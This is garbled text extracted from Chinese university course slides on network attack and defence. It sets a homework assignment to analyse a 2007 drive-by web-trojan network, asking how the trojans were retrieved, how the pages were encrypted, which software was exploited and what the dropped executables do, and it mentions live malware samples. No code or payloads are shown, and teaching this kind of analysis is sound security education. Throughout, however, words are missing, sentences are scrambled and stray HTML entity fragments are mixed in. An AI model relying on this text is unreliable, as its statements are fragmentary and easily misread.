諸葛內(nèi)容1.網(wǎng)絡(luò)掛馬IM&P2P安全作業(yè)9：

掛馬案例分析68網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛作業(yè)9：

掛馬案例分析案例分析作業(yè)內(nèi)容：案例背景：狩獵女神項目組于2007年10月進(jìn)行的中國網(wǎng)掛馬現(xiàn)象采樣分析過程中，發(fā)現(xiàn)了一個龐大的木馬網(wǎng)絡(luò)，宿最終都將

流量重定主站點為18，大量被掛馬向到了這個宿主上的網(wǎng)頁木馬。你的任務(wù)就是分析這個案例，出這個木馬網(wǎng)絡(luò)。案例分析

(目前由于單位網(wǎng)絡(luò)調(diào)整尚無法，fix后將盡快在BBS上發(fā)布)http:/

/作業(yè)9分?jǐn)?shù)：20+3作業(yè)9

Deadline:12月30日下午17:0069網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛作業(yè)9說明掛馬

和宿主站點已無法，但在保存了原始的掛馬頁面http:/

/、網(wǎng)馬和植入木馬可執(zhí)行文件的形式地址：/hashed/[hash_value]后從中提取網(wǎng)馬和/或植入木每

出一個原始的URL例如對原始URL做MD5，獲得hash值使用hash值構(gòu)建原始文件http:/網(wǎng)頁可能會被加密，需要進(jìn)行馬的原始URL最終的

器和植入木馬為可執(zhí)行文件(wild

malware，注意！)，可選擇性的進(jìn)行分析70網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛作業(yè)9-問題基本問題1.試述你是如何一步步地從所給的網(wǎng)頁中獲取最后的網(wǎng)頁木馬和植入木馬？2.網(wǎng)頁和JavaScript代碼中都使用了什么樣的加密方法？你是如何3.從的？后的結(jié)果來看，

者的網(wǎng)頁木馬利用了那些系統(tǒng)和應(yīng)用程序

？Bonus問題4.

后發(fā)現(xiàn)了多少個可執(zhí)行文件？其作用是什么？5.這些可執(zhí)行文件中有

器么？如果有，它們了哪些程序？這些程序又是什么作用的？71網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛下堂課預(yù)告12月23日10-12節(jié)課程內(nèi)容課程13-無線網(wǎng)絡(luò)和移動終端平臺安全建議閱讀《

大

》第8章-無線Deadline提醒項目實踐Checkpoint：12月30日23:59提交項目實踐報告和相關(guān)資料（源碼等）第一批項目實踐展示：尚有空缺名額，希望踴躍報名第二批項目實踐展示：72網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛作業(yè)9講解-問題1掛馬

:網(wǎng)頁木馬宿